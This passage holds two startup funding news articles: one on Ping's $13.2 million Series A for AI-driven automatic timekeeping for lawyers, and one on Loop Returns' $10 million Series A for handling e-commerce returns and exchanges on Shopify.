That’s motivated him as he’s built his startup Ping, which uses artificial intelligence to automatically track lawyers’ work and fill out timesheets for them. There’s a massive opportunity to eliminate a core cause of burnout, lift law firm revenue by around 10% and give them fresh insights into labor allocation.

Ping co-founder and CEO Ryan Alshak (Image Credit: Margot Duane)

That’s why today Ping is announcing a $13.2 million Series A led by Upfront Ventures, along with BoxGroup, First Round, Initialized and Ulu Ventures. Adding to Ping’s quiet $3.7 million seed led by First Round last year, the startup will spend the cash to scale up enterprise distribution and become the new timekeeping standard.

I was a corporate litigator at Manatt Phelps down in LA and joke that I was voted the world’s worst timekeeper,” Alshak tells me. “I could either get better at doing something I dreaded or I could try and build technology that did it for me.”

The promise of eliminating the hassle could make any lawyer who hears about Ping an advocate for the firm buying the startup’s software, like how Dropbox grew as workers demanded easier file sharing. “I’ve experienced first-hand the grind of filling out timesheets,” writes Initialized partner and former attorney Alda Leu Dennis. “Ping takes away the drudgery of manual timekeeping and gives lawyers back all those precious hours.”

Traditionally, lawyers have to keep track of their time by themselves down to the tenth of an hour — reviewing documents for the Johnson case, preparing a motion to dismiss for the Lee case, a client phone call for the Sriram case. There are timesheets built into legal software suites like MyCase, legal billing software like TimeSolv and one-off tools like Time Miner and iTimeKeep. They typically offer timers that lawyers can manually start and stop on different devices, with some providing tracking of scheduled appointments, call and text logging, and integration with billing systems.

Ping goes a big step further. It uses AI and machine learning to figure out whether an activity is billable, for which client, a description of the activity and its codification beyond just how long it lasted. Instead of merely filling in the minutes, it completes all the logs automatically, with entries like “Writing up a deposition – Jenkins Case – 18 minutes.” Then it presents the timesheet to the user for review before they send it to billing.

The big challenge now for Alshak and the team he’s assembled is to grow up. They need to go from cat-in-sunglasses logo Ping to mature wordmark Ping.  “We have to graduate from being a startup to being an enterprise software company,” the CEO tells meThat means learning to sell to C-suites and IT teams, rather than just build a solid product. In the relationship-driven world of law, that’s a very different skill set. Ping will have to convince clients it’s worth switching to not just for the time savings and revenue boost, but for deep data on how they could run a more efficient firm.

Along the way, Ping has to avoid any embarrassing data breaches or concerns about how its scanning technology could violate attorney-client privilege. If it can win this lucrative first business in legal, it could barge into the consulting and accounting verticals next to grow truly huge.

With eager customers, a massive market, a weak status quo and a driven founder, Ping just needs to avoid getting in over its heads with all its new cash. Spent well, the startup could leap ahead of the less tech-savvy competition.

Alshak seems determined to get it right. “We have an opportunity to build a company that gives people back their most valuable resource — time — to spend more time with their loved ones because they spent less time working,” he tells me. “My mom will live forever because she taught me the value of time. I am deeply motivated to build something that lasts . . . and do so in her name.”

Loop Returns picks up $10 million in Series A led by FirstMark Capital

Loop Returns, the startup that helps brands handle returns from online purchases, has today announced the close of a $10 million Series A funding round led by FirstMark Capital. Lerer Hippeau and Ridge Ventures also participated in the round.

Loop started when Jonathan Poma, a co-founder and COO and president, was working at an agency and consulting with a big Shopify brand on how to improve their system for returns and exchanges. After partnering with longtime friend Corbett Morgan, Loop Returns was born.

Loop sits on top of Shopify to handle all of a brand’s returns. It first asks the customer if they’d like a different size in the item they bought, quickly managing an exchange. It then asks if the customer would prefer to exchange for a new item altogether, depositing the credit in that person’s account in real time so they can shop for something new immediately.

If an exchange isn’t in the cards, Loop will ask the customer if they’d prefer credit with this brand over a straight-up refund.

The goal, according to Poma and Morgan, is to turn the point of return into a moment where brands can create a life-loyal customer when handled quickly and properly.

The more we shop online, the more brands extend themselves financially, and returns are a big part of that. Returns account for 20 to 30% of e-commerce sales, which can become a terrible financial burden on a growing direct-to-consumer brand. And what’s more, the cost of acquiring those users in the first place also goes down the drain.

Loop Returns hopes to keep that customer in the fold by giving them post-purchase options that are more sticky and more lucrative for the brand than a refund.

The company thinks of it as Connection Infrastructure. Most brands already have a customer acquisition architecture, and Shopify and Amazon are ahead when it comes to the infrastructure around customer convenience. But the ties that bind customers to brands haven’t been optimized for the many D2C brands out there looking to make an impact.

“The big problem we’re trying to solve long term is connection infrastructure,” said Morgan. “Why does this brand matter? Why does it mean something to me? Why does the product matter? We want to enforce more mindfulness and meaning into buying.”

Of course, a more mindful shopper doesn’t yield as many returns. Poma and Morgan admit that the goal of their software is to minimize returns, the very reason for the software’s existence. After all, return volume is one of a handful of variables that help Loop Returns determine what it will charge its brand clients.

But the team is thinking about other layers of the connection infrastructure, with plans to launch a product in 2020 that also focuses on the connection point after purchase. Poma and Morgan believe, with an almost religious reverence, that the brands themselves will help lead shoppers and infrastructure providers to a better, more connected shopping experience.

“Brands are the torch bearers,” said Poma. “They will lead us to a more enlightened era of how we think about buying. Empowerment of the brand will lead us to a better consumerism.”

The co-founders stayed mum on any specific plans for the 2020 product, but did say they will use the funding to expand operations and further build out its current and future products.

Of course, Loop is playing in a crowded space. Not only are there other players thinking about post-purchase connection, but Shopify has itself built out tools to help with exchanges and returns, and even acquired Return Magic, a similar service, in the summer of 2018.

That said, Loop Returns believes there is a long way to go as it builds the “connection infrastructure,” and that one clear path forward is actual personalization. With data from returns and exchanges, Loop Returns is relatively well-positioned to take on personalization in a meaningful way.

For now, Loop Returns has more than 200 customers and has handled more than 2 million returns, working with brands like Brooklinen, Allbirds, PuraVida and more.